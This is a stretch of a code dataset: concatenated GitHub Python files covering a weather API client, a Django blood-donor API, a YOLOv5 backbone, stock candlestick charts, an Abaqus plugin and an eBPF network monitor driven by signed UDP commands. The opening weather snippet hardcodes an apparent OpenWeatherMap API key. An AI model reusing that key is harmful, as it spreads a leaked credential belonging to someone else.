logging.getLogger()\nlogger.setLevel(logging.DEBUG)\nfrom openweathermap_requests import OpenWeatherMapRequests\n\now = OpenWeatherMapRequests(api_key='f88e4f9c0329490d11901f8ff47777df', cache_name='cache-openweathermap', expire_after=5*60)\n\n# Historic weather by lat/lon\n\n(lon, lat) = (0.34189, 46.5798114) # Poitiers\n\ndata = ow.get_weather(lon=lon, lat=lat) # display current weather data\nprint(data)\n\n","repo_name":"Aluriak/24hducode2016","sub_path":"pocs/weather_python_lib_exemple.py","file_name":"weather_python_lib_exemple.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"19337354309","text":"from rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom.models import BloodDoner \nfrom.serializers import BloodDonerSerializers\n\n# Create your views here.\n@api_view(['GET','POST'])\ndef blood_doner(request):\n if request.method == 'GET':\n doners = BloodDoner.objects.all().order_by('id')\n serializer=BloodDonerSerializers(doners,many=True)\n return Response(serializer.data)\n \n if request.method=='POST':\n serializer=BloodDonerSerializers(data=request.data)\n if serializer.is_valid(raise_exception=True):\n serializer.save()\n return Response({'Success':\"Successfully created\"})\n\n@api_view(['GET','POST'])\ndef blood_doner_update(request,id):\n if request.method == 'GET':\n doners = BloodDoner.objects.get(id=id)\n serializer=BloodDonerSerializers(doners,many=False)\n return Response(serializer.data)\n \n if request.method=='POST':\n doners = BloodDoner.objects.get(id=id)\n serializer=BloodDonerSerializers(data=request.data,instance=doners)\n if serializer.is_valid(raise_exception=True):\n serializer.save()\n return Response({'Success':\"Successfully Updated\"}) \n\n@api_view(['delete'])\ndef blood_doner_delete(request,id):\n \n doners = BloodDoner.objects.get(id=id)\n doners.delete()\n\n return Response({'Success':\"Successfully deleted\"}) \n\n# @api_view(['GET'])\n# def hello_world(request):\n# return Response({\"message\": \"Hello, world!\"})","repo_name":"KanxoDai/djangoProject","sub_path":"blog/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"13136191460","text":"import torch\r\nimport torch.nn as nn\r\n\r\n\r\nclass SiLU(nn.Module):\r\n @staticmethod\r\n def forward(x):\r\n return x * torch.sigmoid(x)\r\n\r\ndef autopad(k, p=None):\r\n if p is None:\r\n p = k // 2 if isinstance(k, int) else [x // 2 for x in k] \r\n return p\r\n\r\nclass Focus(nn.Module):\r\n def __init__(self, c1, c2, k=1, s=1, p=None, g=1, act=True): # ch_in, ch_out, kernel, stride, padding, groups\r\n super(Focus, self).__init__()\r\n self.conv = Conv(c1 * 4, c2, k, s, p, g, act)\r\n\r\n def forward(self, x):\r\n # 320, 320, 12 => 320, 320, 64\r\n return self.conv(\r\n # 640, 640, 3 => 320, 320, 12\r\n torch.cat(\r\n [\r\n x[..., ::2, ::2], \r\n x[..., 1::2, ::2], \r\n x[..., ::2, 1::2], \r\n x[..., 1::2, 1::2]\r\n ], 1\r\n )\r\n )\r\n\r\nclass Conv(nn.Module):\r\n def __init__(self, c1, c2, k=1, s=1, p=None, g=1, act=True):\r\n super(Conv, self).__init__()\r\n self.conv = nn.Conv2d(c1, c2, k, s, autopad(k, p), groups=g, bias=False)\r\n self.bn = nn.BatchNorm2d(c2, eps=0.001, momentum=0.03)\r\n self.act = SiLU() if act is True else (act if isinstance(act, nn.Module) else nn.Identity())\r\n\r\n def forward(self, x):\r\n return 
self.act(self.bn(self.conv(x)))\r\n\r\n def fuseforward(self, x):\r\n return self.act(self.conv(x))\r\n\r\nclass Bottleneck(nn.Module):\r\n # Standard bottleneck\r\n def __init__(self, c1, c2, shortcut=True, g=1, e=0.5): # ch_in, ch_out, shortcut, groups, expansion\r\n super(Bottleneck, self).__init__()\r\n c_ = int(c2 * e) # hidden channels\r\n self.cv1 = Conv(c1, c_, 1, 1)\r\n self.cv2 = Conv(c_, c2, 3, 1, g=g)\r\n self.add = shortcut and c1 == c2\r\n\r\n def forward(self, x):\r\n return x + self.cv2(self.cv1(x)) if self.add else self.cv2(self.cv1(x))\r\n\r\nclass C3(nn.Module):\r\n # CSP Bottleneck with 3 convolutions\r\n def __init__(self, c1, c2, n=1, shortcut=True, g=1, e=0.5): # ch_in, ch_out, number, shortcut, groups, expansion\r\n super(C3, self).__init__()\r\n c_ = int(c2 * e) # hidden channels\r\n self.cv1 = Conv(c1, c_, 1, 1)\r\n self.cv2 = Conv(c1, c_, 1, 1)\r\n self.cv3 = Conv(2 * c_, c2, 1) # act=FReLU(c2)\r\n self.m = nn.Sequential(*[Bottleneck(c_, c_, shortcut, g, e=1.0) for _ in range(n)])\r\n # self.m = nn.Sequential(*[CrossConv(c_, c_, 3, 1, g, 1.0, shortcut) for _ in range(n)])\r\n\r\n def forward(self, x):\r\n return self.cv3(torch.cat(\r\n (\r\n self.m(self.cv1(x)), \r\n self.cv2(x)\r\n )\r\n , dim=1))\r\n\r\nclass SPP(nn.Module):\r\n # Spatial pyramid pooling layer used in YOLOv3-SPP\r\n def __init__(self, c1, c2, k=(5, 9, 13)):\r\n super(SPP, self).__init__()\r\n c_ = c1 // 2 # hidden channels\r\n self.cv1 = Conv(c1, c_, 1, 1)\r\n self.cv2 = Conv(c_ * (len(k) + 1), c2, 1, 1)\r\n self.m = nn.ModuleList([nn.MaxPool2d(kernel_size=x, stride=1, padding=x // 2) for x in k])\r\n\r\n def forward(self, x):\r\n x = self.cv1(x)\r\n return self.cv2(torch.cat([x] + [m(x) for m in self.m], 1))\r\n \r\nclass CSPDarknet(nn.Module):\r\n def __init__(self, base_channels, base_depth, phi, pretrained):\r\n super().__init__()\r\n #-----------------------------------------------#\r\n # 输入图片是640, 640, 3\r\n # 初始的基本通道base_channels是64\r\n #-----------------------------------------------#\r\n\r\n #-----------------------------------------------#\r\n # 利用focus网络结构进行特征提取\r\n # 640, 640, 3 -> 320, 320, 12 -> 320, 320, 64\r\n #-----------------------------------------------#\r\n self.stem = Focus(3, base_channels, k=3)\r\n \r\n #-----------------------------------------------#\r\n # 完成卷积之后,320, 320, 64 -> 160, 160, 128\r\n # 完成CSPlayer之后,160, 160, 128 -> 160, 160, 128\r\n #-----------------------------------------------#\r\n self.dark2 = nn.Sequential(\r\n # 320, 320, 64 -> 160, 160, 128\r\n Conv(base_channels, base_channels * 2, 3, 2),\r\n # 160, 160, 128 -> 160, 160, 128\r\n C3(base_channels * 2, base_channels * 2, base_depth),\r\n )\r\n \r\n #-----------------------------------------------#\r\n # 完成卷积之后,160, 160, 128 -> 80, 80, 256\r\n # 完成CSPlayer之后,80, 80, 256 -> 80, 80, 256\r\n # 在这里引出有效特征层80, 80, 256\r\n # 进行加强特征提取网络FPN的构建\r\n #-----------------------------------------------#\r\n self.dark3 = nn.Sequential(\r\n Conv(base_channels * 2, base_channels * 4, 3, 2),\r\n C3(base_channels * 4, base_channels * 4, base_depth * 3),\r\n )\r\n\r\n #-----------------------------------------------#\r\n # 完成卷积之后,80, 80, 256 -> 40, 40, 512\r\n # 完成CSPlayer之后,40, 40, 512 -> 40, 40, 512\r\n # 在这里引出有效特征层40, 40, 512\r\n # 进行加强特征提取网络FPN的构建\r\n #-----------------------------------------------#\r\n self.dark4 = nn.Sequential(\r\n Conv(base_channels * 4, base_channels * 8, 3, 2),\r\n C3(base_channels * 8, base_channels * 8, base_depth * 3),\r\n )\r\n \r\n #-----------------------------------------------#\r\n # 
完成卷积之后,40, 40, 512 -> 20, 20, 1024\r\n # 完成SPP之后,20, 20, 1024 -> 20, 20, 1024\r\n # 完成CSPlayer之后,20, 20, 1024 -> 20, 20, 1024\r\n #-----------------------------------------------#\r\n self.dark5 = nn.Sequential(\r\n Conv(base_channels * 8, base_channels * 16, 3, 2),\r\n SPP(base_channels * 16, base_channels * 16),\r\n C3(base_channels * 16, base_channels * 16, base_depth, shortcut=False),\r\n )\r\n if pretrained:\r\n url = {\r\n 's' : 'https://github.com/bubbliiiing/yolov5-pytorch/releases/download/v1.0/cspdarknet_s_backbone.pth',\r\n 'm' : 'https://github.com/bubbliiiing/yolov5-pytorch/releases/download/v1.0/cspdarknet_m_backbone.pth',\r\n 'l' : 'https://github.com/bubbliiiing/yolov5-pytorch/releases/download/v1.0/cspdarknet_l_backbone.pth',\r\n 'x' : 'https://github.com/bubbliiiing/yolov5-pytorch/releases/download/v1.0/cspdarknet_x_backbone.pth',\r\n }[phi]\r\n checkpoint = torch.hub.load_state_dict_from_url(url=url, map_location=\"cpu\", model_dir=\"./model_data\")\r\n self.load_state_dict(checkpoint, strict=False)\r\n print(\"Load weights from \", url.split('/')[-1])\r\n \r\n def forward(self, x):\r\n x = self.stem(x)\r\n x = self.dark2(x)\r\n #-----------------------------------------------#\r\n # dark3的输出为80, 80, 256,是一个有效特征层\r\n #-----------------------------------------------#\r\n x = self.dark3(x)\r\n feat1 = x\r\n #-----------------------------------------------#\r\n # dark4的输出为40, 40, 512,是一个有效特征层\r\n #-----------------------------------------------#\r\n x = self.dark4(x)\r\n feat2 = x\r\n #-----------------------------------------------#\r\n # dark5的输出为20, 20, 1024,是一个有效特征层\r\n #-----------------------------------------------#\r\n x = self.dark5(x)\r\n feat3 = x\r\n return feat1, feat2, feat3\r\nclass ResnetBlock(nn.Module):\r\n\r\n def __init__(self, dim, padding_type, norm_layer, use_dropout, use_bias):\r\n super(ResnetBlock, self).__init__()\r\n self.conv_block = self.build_conv_block(dim, padding_type, norm_layer, use_dropout, use_bias)\r\n self.self_attention=Self_Attention(dim,'relu')\r\n def build_conv_block(self, dim, padding_type, norm_layer, use_dropout, use_bias):\r\n conv_block = []\r\n p = 0\r\n if padding_type == 'reflect':\r\n conv_block += [nn.ReflectionPad2d(1)]\r\n elif padding_type == 'replicate':\r\n conv_block += [nn.ReplicationPad2d(1)]\r\n elif padding_type == 'zero':\r\n p = 1\r\n else:\r\n raise NotImplementedError('padding [%s] is not implemented' % padding_type)\r\n\r\n conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=p, bias=use_bias), norm_layer(dim), nn.ReLU(True)]\r\n if use_dropout:\r\n conv_block += [nn.Dropout(0.5)]\r\n\r\n p = 0\r\n if padding_type == 'reflect':\r\n conv_block += [nn.ReflectionPad2d(1)]\r\n elif padding_type == 'replicate':\r\n conv_block += [nn.ReplicationPad2d(1)]\r\n elif padding_type == 'zero':\r\n p = 1\r\n else:\r\n raise NotImplementedError('padding [%s] is not implemented' % padding_type)\r\n conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=p, bias=use_bias), norm_layer(dim)]\r\n\r\n return nn.Sequential(*conv_block)\r\n\r\n def forward(self, x):\r\n out = self.self_attention(x) + self.conv_block(x)+x\r\n return out\r\nclass Self_Attention(nn.Module):\r\n \"\"\" Self attention Layer\"\"\"\r\n\r\n def __init__(self, in_dim, activation):\r\n super(Self_Attention, self).__init__()\r\n self.chanel_in = in_dim\r\n self.activation = activation\r\n ## 下面的query_conv,key_conv,value_conv即对应Wg,Wf,Wh\r\n self.query_conv = nn.Conv2d(in_channels=in_dim, out_channels=in_dim // 8, kernel_size=1) # 即得到C^ X C\r\n 
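# Hedged assumption: forward() uses self.key_conv and self.value_conv (the Wf and Wh named in the comment above); the two projections below assume the standard SAGAN shapes -- key: C -> C//8 (same as query), value: C -> C.\r\n 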
self.key_conv = nn.Conv2d(in_channels=in_dim, out_channels=in_dim // 8, kernel_size=1)\r\n self.value_conv = nn.Conv2d(in_channels=in_dim, out_channels=in_dim, kernel_size=1)\r\n self.gamma = nn.Parameter(torch.zeros(1)) # gamma scales the attention branch in the final sum; initialized to 0\r\n\r\n self.softmax = nn.Softmax(dim=-1)\r\n\r\n def forward(self, x):\r\n \"\"\"\r\n inputs :\r\n x : input feature maps( B X C X W X H)\r\n returns :\r\n out : self attention value + input feature\r\n attention: B X N X N (N is Width*Height)\r\n \"\"\"\r\n m_batchsize, C, width, height = x.size()\r\n ## proj_query and proj_key below give (C^ X C)(C X N) = C^ X N\r\n proj_query = self.query_conv(x).view(m_batchsize, -1, width * height).permute(0, 2, 1) # B X C X (N); permute is the transpose\r\n proj_key = self.key_conv(x).view(m_batchsize, -1, width * height) # B X C x (*W*H)\r\n energy = torch.bmm(proj_query, proj_key) # transpose check, batched dot product\r\n attention = self.softmax(energy) # B X N X N (assumed SAGAN formulation)\r\n proj_value = self.value_conv(x).view(m_batchsize, -1, width * height) # B X C X N\r\n out = torch.bmm(proj_value, attention.permute(0, 2, 1))\r\n out = out.view(m_batchsize, C, width, height)\r\n\r\n out = self.gamma * out + x\r\n return out","repo_name":"BosserWang/Yolov5_water","sub_path":"yolov5-pytorch-main-1/yolov5-pytorch-main/nets/CSPdarknet.py","file_name":"CSPdarknet.py","file_ext":"py","file_size_in_byte":10668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}{"seq_id":"10613501459","text":"from verduleria_stock import datosFijos\n\n# ----- main program ----------\nresultados = datosFijos() #load the fixed data\narticulos=resultados[0]\nprecios=resultados[1]\ncantidades={}\ntotal = 0\nformato_columna = '{0:<10} {1:<2}kg. :$ {2:<4} $ {3:<12}'\nprint(articulos,precios)","repo_name":"rodri9872/verduleria_python","sub_path":"verduleria_poo.py","file_name":"verduleria_poo.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}{"seq_id":"815119900","text":"'''\n#Please use the following example commands to specify the path containing code and data:\nimport os\nos.chdir('E:\\\\PythonBook_code_data\\\\part5\\\\28')\n'''\nimport pandas as pd\ntaiex2013=pd.read_csv('taiex2013.csv',sep='\\t')\ntaiex2013.head(n=3)\n\ntaiex2013.index = pd.to_datetime(taiex2013.Date)\ntype(taiex2013.index)\ntaiex201304 = taiex2013['2013-04'] \n\nfrom matplotlib.dates import date2num\nfrom datetime import datetime\n\ntaiex201304.Date=[date2num(datetime.strptime(date,\"%Y-%m-%d\"))\\\n for date in taiex201304.Date]\n \ntaiex201304.head()\ntype(taiex201304)\n\ntaiex201304_listData=[]\nfor i in range(len(taiex201304)):\n a=[taiex201304.Date[i],\\\n taiex201304.Open[i],taiex201304.High[i],\\\n taiex201304.Low[i],taiex201304.Close[i]]\n taiex201304_listData.append(a)\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.dates import DateFormatter, WeekdayLocator,\\\n DayLocator, MONDAY\nfrom matplotlib.finance import candlestick_ohlc\n\nax= plt.subplot()\nmondays = WeekdayLocator(MONDAY)\nax.xaxis.set_major_locator(mondays)\nax.xaxis.set_minor_locator(DayLocator() )\nweekFormatter = DateFormatter('%y %b %d')\nax.xaxis.set_major_formatter(weekFormatter)\nplt.rcParams['font.sans-serif'] = ['SimHei']\nplt.rcParams['axes.unicode_minus'] = False\nax.set_title('加權股價指數2013年4月份K線圖')\ncandlestick_ohlc(ax, taiex201304_listData, \n width=0.7,colorup='r', colordown='g');\nplt.setp(plt.gca().get_xticklabels(),\n rotation=50,\n horizontalalignment='center')\nplt.show()\n\nfrom candle import candlePlot\n\ncandlePlot(taiex201304,title='加權股價指數2013年4月份K線圖')\n\n#morning star\ntaiex2011=pd.read_csv('taiex2011.csv',sep='\\t')\ntaiex2011.index=pd.to_datetime(taiex2011.Date,\n format='%Y-%m-%d')\n\ntaiex2011.head(2)\ntaiex2011.iloc[-2:,:]\n\nClose=taiex2011.Close\nOpen=taiex2011.Open\nClOp=Close-Open\nClOp.head()\nClOp.describe()\n\nShape = [0,0,0]\nfor i in range(3,len(ClOp)):\n if 
all([ClOp[i-2]<-20,abs(ClOp[i-1])< 20,\\\n ClOp[i]>5,abs(ClOp[i])>abs(ClOp[i-2]*0.5)]):\n Shape.append(1)\n else:\n Shape.append(0)\n\nShape.index(1)\n\n\nDoji=[0,0,0]\nfor i in range(3,len(Open)):\n if all([Open[i-1]Open13[i-1],\\\n Open13[i]>Close13[i-1],\\\n Close13[i]<0.5*(Close13[i-1]+Open13[i-1]),\\\n Close13[i]>Open13[i-1]]):\n Cloud[i]=1\n\n\nTrend=pd.Series(0,index=Close13.index)\nfor i in range(2,len(Close13)):\n if Close13[i-1]>Close13[i-2]>Close13[i-3]:\n Trend[i]=1\n\ndarkCloud=Cloud+Trend\ndarkCloud[darkCloud==2]\n\n\ntaiex201304=taiex2013['2013-04'] \ncandle.candlePlot(taiex201304 ,\\\n title='加權股價指數2013年4月份的日K線圖')\n\n\ntaiex201310=taiex2013['2013-10']\ncandle.candlePlot(taiex201310,\\\n title='加權股價指數2013年10月份的日K線圖')\n\n\n","repo_name":"weilly0912/Python-Quantitative-investing","sub_path":"part5/28/28.py","file_name":"28.py","file_ext":"py","file_size_in_byte":3903,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"12550452186","text":"# -*- coding: utf-8 -*-\r\n#!/usr/bin/python3\r\n# propellant_v0125-1100 \r\n# Authorn:Jaime Lannister\r\n# Time:2019/2/28-11:49 \r\n\r\nfrom abaqusGui import *\r\nfrom abaqusConstants import ALL\r\nimport osutils, os\r\n\r\nclass Composite_plugin(AFXForm):\r\n\r\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\n def __init__(self, owner):\r\n # Construct the base class.\r\n #\r\n AFXForm.__init__(self, owner)\r\n self.radioButtonGroups = {}\r\n\r\n self.cmd_composite = AFXGuiCommand(mode=self, method='orthotropic_mat',\r\n objectName='propellent_02_modules._01_platform_Part.Part_wcm_kernel',\r\n registerQuery=False)\r\n pickedDefault = ''\r\n\r\n # 定义专属复合材料的属性\r\n self.nameKw = AFXStringKeyword(self.cmd_composite, 'name', True, 'shell')\r\n\r\n # 密度\r\n self.desityKw = AFXFloatKeyword(self.cmd_composite, 'desity', True, 0.056)\r\n\r\n # 弹性模量\r\n self.elasticKw = AFXTableKeyword(self.cmd_composite, 'E_engineer_propellant', True)\r\n self.elasticKw.setColumnType(0, AFXTABLE_TYPE_FLOAT)\r\n self.elasticKw.setColumnType(1, AFXTABLE_TYPE_FLOAT)\r\n self.elasticKw.setColumnType(2, AFXTABLE_TYPE_FLOAT)\r\n self.elasticKw.setColumnType(3, AFXTABLE_TYPE_FLOAT)\r\n self.elasticKw.setColumnType(4, AFXTABLE_TYPE_FLOAT)\r\n self.elasticKw.setColumnType(5, AFXTABLE_TYPE_FLOAT)\r\n self.elasticKw.setColumnType(6, AFXTABLE_TYPE_FLOAT)\r\n self.elasticKw.setColumnType(7, AFXTABLE_TYPE_FLOAT)\r\n self.elasticKw.setColumnType(8, AFXTABLE_TYPE_FLOAT)\r\n\r\n # 热传导\r\n self.conductivityKw = AFXTableKeyword(self.cmd_composite, 'conductivity', True)\r\n self.conductivityKw.setColumnType(0, AFXTABLE_TYPE_FLOAT)\r\n self.conductivityKw.setColumnType(1, AFXTABLE_TYPE_FLOAT)\r\n\r\n # 热膨胀\r\n self.expansionKw = AFXTableKeyword(self.cmd_composite, 'expansion', True)\r\n self.expansionKw.setColumnType(0, AFXTABLE_TYPE_FLOAT)\r\n self.expansionKw.setColumnType(1, AFXTABLE_TYPE_FLOAT)\r\n\r\n # 比热容\r\n self.specificKw = AFXFloatKeyword(self.cmd_composite, 'specific', True, 0.1)\r\n\r\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n def getFirstDialog(self):\r\n\r\n import compositeDB\r\n return compositeDB.CompositeDB(self)\r\n\r\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\n def doCustomChecks(self):\r\n\r\n # Try to set the appropriate radio button on. 
If the user did\r\n # not specify any buttons to be on, do nothing.\r\n #\r\n for kw1, kw2, d in self.radioButtonGroups.values():\r\n try:\r\n value = d[kw1.getValue()]\r\n kw2.setValue(value)\r\n except:\r\n pass\r\n return True\r\n\r\n def okToCancel(self):\r\n\r\n # No need to close the dialog when a file operation (such\r\n # as New or Open) or model change is executed.\r\n #\r\n return False\r\n\r\n def onCmdWarning(self, sender, sel, ptr):\r\n # print 'haha'\r\n if sender.getPressedButtonId() == \\\r\n AFXDialog.ID_CLICKED_YES:\r\n self.issueCommands()\r\n elif sender.getPressedButtonId() == \\\r\n AFXDialog.ID_CLICKED_NO:\r\n self.deactivate()\r\n\r\n\r\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"PandaJerrrrrrrry/propellant","sub_path":"propellent_02_modules/_01_platform_Part/composite/composite_plugin.py","file_name":"composite_plugin.py","file_ext":"py","file_size_in_byte":3502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"60"} +{"seq_id":"17794523706","text":"from __future__ import division # Get float instead of int for div\nfrom bcc import BPF\nimport socket\nimport time\nimport json\nimport logging\nimport random\n\nfrom datetime import datetime\n\nimport base64\nfrom cryptography.exceptions import InvalidSignature\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives.asymmetric import padding\nfrom cryptography.hazmat.primitives import hashes\n\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(level=logging.INFO)\n\nrunning_global = 0\nlosing_rate_global = 0\nstart_time_global = 0\ncommand_global = []\nb = BPF(src_file='monitor_ebpf.c')\n\nhost_address = ('', 10000)\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\ndef serialize_stats():\n \"\"\"Parse gathered statistics to JSON format\"\"\"\n global start_time_global\n serialized = json.dumps({'time_start': start_time_global,\n 'time_end': time.time(),\n 'rcv_packets': b['stats_map'][0].value,\n 'snt_packets': b['stats_map'][1].value,\n 'tcp_packets': b['proto_map_snd'][socket.IPPROTO_TCP].value,\n 'udp_packets': b['proto_map_snd'][socket.IPPROTO_UDP].value,\n 'icmp_packets': b['proto_map_snd'][socket.IPPROTO_ICMP].value,\n 'arp_packets': b['stats_map'][2].value,\n 'ports': port_map_to_list(),\n 'ipv4_packets': b['stats_map'][3].value,\n 'ipv6_packets': b['stats_map'][4].value,\n 'retrans_packets': b['stats_map'][5].value\n })\n return serialized\n\n\ndef port_map_to_list():\n \"\"\"Gather ports numbers and make a list\"\"\"\n data_map = b['ports_map']\n port_list = []\n for k, v in data_map.items():\n if v.value != 0:\n port_list.append(k.value)\n return port_list\n\n\ndef send_error(error_msg, address):\n \"\"\"Send error to the indicated address\"\"\"\n logger.info('Error message sent to %s: %s' % (address[0], error_msg))\n sock.sendto(error_msg, address)\n\n\ndef random_wait():\n \"\"\"Wait for x seconds\"\"\"\n val = random.uniform(0, 101) / 100 # Between 0 and 1 seconds\n time.sleep(val)\n\n\ndef send_stats(initiator, command):\n \"\"\"Sends statistics to server or initiator\"\"\"\n json_stats = serialize_stats()\n logger.info('Gathered stats:%s' % json_stats)\n\n if 'server' in command: # Send stats to server\n stat_dst = (command['server'][0], int(command['server'][1]))\n else: # Send stats to initiator\n stat_dst = initiator\n\n random_wait() # Avoid sync 
between eBPF devices\n try:\n sock.sendto(json_stats, stat_dst)\n logger.info('Stats sent to %s' % (stat_dst[0]))\n print('Stats sent to %s' % (stat_dst[0]))\n clean_maps()\n except socket.error:\n print('ERROR: Stats not sent')\n\n\n\n\n\ndef clean_maps():\n global losing_rate_global\n b['stats_map'].clear()\n b['proto_map_snd'].clear()\n b['ports_map'].clear()\n losing_rate_global = 0\n\n\ndef start_ebpf():\n \"\"\"Start eBPF statistic gathering\"\"\"\n global running_global, command_global\n running_global = 1\n\n # Packets\n b.attach_kprobe(event='ip_rcv', fn_name='detect_rcv_pkts')\n b.attach_kprobe(event='ip_output', fn_name='detect_snt_pkts')\n\n # Protocols\n b.attach_kprobe(event='ip_output', fn_name='detect_protocol_snd')\n b.attach_kprobe(event='arp_rcv', fn_name='detect_arp')\n b.attach_kprobe(event='arp_send', fn_name='detect_arp')\n\n # Ports\n b.attach_kprobe(event='ip_output', fn_name='detect_dport')\n\n # IP family\n b.attach_kprobe(event='ip_output', fn_name='detect_family')\n b.attach_kprobe(event='ip_rcv', fn_name='detect_family')\n\n # Loss\n if command_global['cmd'] == 'THRESH':\n b.attach_kprobe(event='tcp_retransmit_timer', fn_name='detect_thresh_pkts')\n b.attach_kprobe(event='tcp_fastretrans_alert', fn_name='detect_thresh_pkts')\n else:\n b.attach_kprobe(event='tcp_retransmit_timer', fn_name='detect_retrans_pkts')\n b.attach_kprobe(event='tcp_fastretrans_alert', fn_name='detect_retrans_pkts')\n\n\ndef stop_ebpf():\n \"\"\"Stop eBPF statistic gathering\"\"\"\n global running_global\n running_global = 0\n\n b.detach_kprobe('ip_rcv')\n b.detach_kprobe('ip_output')\n b.detach_kprobe('arp_rcv')\n b.detach_kprobe('arp_send')\n b.detach_kprobe('tcp_retransmit_timer')\n b.detach_kprobe('tcp_fastretrans_alert')\n\n clean_maps()\n\n\ndef cmd_run(init_address, command):\n \"\"\"RUN command process\"\"\"\n global start_time_global\n logger.info('RUN for %s sec' % command['time'])\n start_ebpf()\n\n start_time_global = time.time() # eBPF starting timestamp\n time.sleep(command['time']) # Period of stat gathering\n\n send_stats(init_address, command)\n stop_ebpf()\n\n\ndef cmd_start():\n \"\"\"START command process\"\"\"\n global start_time_global\n logger.info('START')\n start_ebpf()\n start_time_global = time.time()\n\n\ndef cmd_get(init_address, command):\n \"\"\"GET command process\"\"\"\n global start_time_global\n logger.info('GET')\n send_stats(init_address, command)\n start_time_global = time.time()\n\n\ndef cmd_stop():\n \"\"\"STOP command process\"\"\"\n logger.info('STOP')\n stop_ebpf()\n\n\ndef cmd_period(init_address, command):\n \"\"\"PERIOD command process\"\"\"\n global start_time_global\n logger.info('PERIOD for %s sec, interval %s sec' % (command['time'], command['interval']))\n start_ebpf()\n\n future = time.time() + command['time']\n while time.time() < future: # Total period of stats gathering\n print('Next period')\n start_time_global = time.time() # eBPF starting timestamp\n time.sleep(command['interval']) # Interval between two stats gathering\n send_stats(init_address, command)\n\n stop_ebpf()\n\n\ndef parse_lost_data():\n \"\"\"Parse loss concerned data for logging\"\"\"\n global losing_rate_global\n msg = '%s :[snd :%s, retrans :%s]' % (\n datetime.fromtimestamp(time.time()).strftime(\"%H:%M:%S\"),\n losing_rate_global.snt_packets,\n losing_rate_global.retrans_packets)\n return msg\n\n\ndef cmd_thresh(init_address, command):\n \"\"\"THRESH command process\"\"\"\n global losing_rate_global, start_time_global\n logger.info('THRESH with rate: %s for %s 
sec' % (command['rate'], command['time']))\n\n start_ebpf()\n b['events'].open_perf_buffer(update_stats) # Opening channel for events from kernel\n\n future = time.time() + command['time'] # Period of stats gathering\n\n send_interval = 2 # Slow start and min. interval between two sending\n last_moment_sent = time.time() # Last time data was sent\n while time.time() < future:\n if time.time() - last_moment_sent > command['interval']:\n clean_maps()\n logger.info('Next period')\n last_moment_sent = time.time()\n start_time_global = time.time()\n timeout = int(future-time.time())\n\n if timeout > 0:\n b.perf_buffer_poll(timeout*1000) # Block until event happens or TO\n\n # If some lost data has been found\n if losing_rate_global != 0:\n lost_data = parse_lost_data()\n logger.info(lost_data)\n\n sent_pkts = losing_rate_global.snt_packets\n retrans_pkts = losing_rate_global.retrans_packets\n if sent_pkts != 0:\n logger.info('Loss rate:%f' % (retrans_pkts / sent_pkts))\n if ((retrans_pkts / sent_pkts) > command['rate']) and ((time.time() - last_moment_sent) > send_interval):\n print('Loss rate:%f' % (retrans_pkts / sent_pkts))\n send_stats(init_address, command)\n last_moment_sent = time.time()\n stop_ebpf()\n\n\ndef update_stats(cpu, data, size):\n \"\"\"Callback triggered when buffer_poll\"\"\"\n global losing_rate_global\n logger.debug('Updating stats')\n losing_rate_global = b[\"events\"].event(data)\n\n\ndef verify_signature(signed_data):\n \"\"\"Verification of signature\"\"\"\n data_tab = json.loads(signed_data)\n try:\n with open('public_key.pem', 'rb') as key_file: # Public key file\n public_key = serialization.load_pem_public_key(\n key_file.read(),\n backend=default_backend()\n )\n\n public_key.verify(\n signature=base64.urlsafe_b64decode(str(data_tab['signature'])),\n data=data_tab['message'].encode('utf-8'),\n padding=padding.PSS(\n mgf=padding.MGF1(hashes.SHA256()),\n salt_length=padding.PSS.MAX_LENGTH\n ),\n algorithm=hashes.SHA256()\n )\n logger.info('Verified host')\n return data_tab['message']\n except InvalidSignature:\n logger.error('Wrong signature')\n return -1\n except ValueError:\n logger.error('Malformed signature')\n return -1\n\n\ndef main():\n try:\n sock.bind(host_address)\n logger.info('Socket binded to (addr:[%s],port:[%s])' % host_address)\n while True:\n print('Waiting for message...')\n data, init_address = sock.recvfrom(4096)\n logger.info('Message received')\n\n verified_data = verify_signature(data)\n if verified_data == -1:\n send_error('Bad signature', init_address)\n else:\n j = json.loads(verified_data)\n global command_global\n command_global = j\n print('\\nMessage received from %s:\\n%s\\n' % (init_address[0], verified_data))\n\n # Processing the command\n cmd = j['cmd']\n # Wrong command\n if (cmd == 'START' or cmd == 'PERIOD' or cmd == 'THRESH') and running_global:\n logger.error('Already running')\n elif (cmd == 'RUN') and running_global:\n logger.error('Already running')\n send_error('ERROR: Already running', init_address)\n elif cmd == 'GET' and not running_global:\n logger.error('Must first start the stat gathering with cmd: START')\n send_error('ERROR: Must first start the stat gathering with cmd: START', init_address)\n elif cmd == 'STOP' and not running_global:\n logger.error('Must first start the stat gathering with cmd: START')\n\n # Normal behavior\n elif cmd == 